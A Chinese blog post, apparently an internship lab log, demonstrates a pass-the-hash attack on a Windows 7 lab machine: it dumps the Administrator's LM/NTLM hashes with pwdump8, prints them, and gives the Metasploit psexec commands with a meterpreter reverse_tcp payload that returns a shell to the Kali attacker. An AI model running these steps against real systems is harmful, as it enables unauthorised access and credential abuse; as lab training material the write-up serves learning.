zoukankan      html  css  js  c++  java
  • 粤嵌科技毕业实习Day18

    粤嵌科技毕业实习Day18

    最后一篇学习内容

    pth实战

    1. 查看kali攻击机和win7靶机的IP

    2. Win7打开本地用户和组,取消administrator的禁用,并且设置密码。

      WIN+R
      lusrmgr.msc
      

    3. WIN7以管理员的身份打开命令行,执行pwdump8,获得所有用户的密码哈希值,其中Administrator用户
      SID:500
      LM 哈 希:AAD3B435B51404EEAAD3B435B51404EE
      NTLM 哈 希:3DBDE697D71690A769204BEB12283678

    4. kali进入msf框架进行配置并执行攻击指令开始监听。

      msfconsole
      use exploit/windows/smb/psexec
      set payload windows/meterpreter/reverse_tcp
      set lhost 192.168.220.128
      set rhost 192.168.220.129
      set smbuser Administrator
      set smbpass AAD3B435B51404EEAAD3B435B51404EE:3DBDE697D71690A769204BEB12283678
      exploit
      

    5. kali获得控制台权限

      getuid
      shell
      

    6. 遇到的问题

      Administrator的密码设置为123456的时候会报错

      改成123才可以,不知道是什么原因。

    本文作者:AlubNoBug
    本文链接:https://www.cnblogs.com/AlubNoBug/p/13697142.html

  • 相关阅读:
    模电电路分析
    正式答辩提问
    Dockerfile
    Docker常用命令
    docker镜像与容器
    Docker容器与容器数据
    docker命令自动安装
    Docker与虚拟机
    Java Lambda表达式 Stream
    Java Lambda表达式
  • 原文地址:https://www.cnblogs.com/AlubNoBug/p/13697142.html
Copyright © 2011-2022 走看看